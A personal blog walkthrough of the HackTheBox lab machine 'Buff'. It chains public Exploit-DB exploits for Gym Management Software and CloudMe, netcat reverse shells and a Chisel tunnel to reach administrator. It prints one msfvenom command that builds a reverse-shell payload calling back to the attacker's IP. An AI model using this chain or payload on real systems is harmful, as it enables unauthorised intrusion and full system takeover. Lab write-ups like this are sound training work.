Walkthrough — HTB Windows machine “Buff”

Rich Amies
3 min read · Nov 23, 2020

Quick enumeration of the machine with nmap revealed the following information:

A quick look at the content provided by the HTTP server:

Browsing through the site hints that it is written in PHP and is running “Gym Management Software 1.0”:

A quick look online leads me to an unverified exploit on Exploit-DB (https://www.exploit-db.com/exploits/48506). Glancing through the code, it looked like no changes were required, so I just ran with it, and then had to make a few modifications to get it working with Python 3. We get there eventually:

Let’s see if it works:

I was hoping for a reverse shell. Nevertheless, the exploit appears to have successfully created the PHP script on the target:

We do appear to have command execution:

With this, I was able to copy across netcat, hosted by a local Python3 HTTP server:

And then initiate a reverse shell:

Further enumeration from within the system revealed CloudMe.exe running:

We can see Shaun, the current user, downloaded it — we’re also given the software version:

Browsing online, I was able to find an exploit on Exploit-DB (https://www.exploit-db.com/exploits/48389). Reading through the exploit, it is evident that a connection to port 8888 is required. This port did not show up on my initial scan, but local enumeration revealed it is accessible from the machine itself:

I modified the exploit to initiate another reverse shell, taking into account the bad characters referenced in the initial exploit:

msfvenom -a x86 -p windows/shell_reverse_tcp LPORT=53 LHOST=10.10.14.6 -b '\x00\x0A\x0D' -f python -v payload

I then transferred across plink.exe, planning to use it to forward the port to my local Kali machine, but after far longer than I’d have liked I gave up and moved to a different tool:

I transferred across Chisel (https://github.com/jpillora/chisel/releases):

And used it to set up a tunnel, so that port 8888 on the server is now reachable on my local machine:

And finally, upon executing the Python exploit we modified earlier, we are presented with a shell as the administrator account on the Buff server, caught by my netcat listener on port 53:

Rich Amies

Documenting some of what I’ve learnt whilst becoming a cybergeek! Mostly HTB and OffSec Proving Grounds. Extremely human, full of imposter syndrome.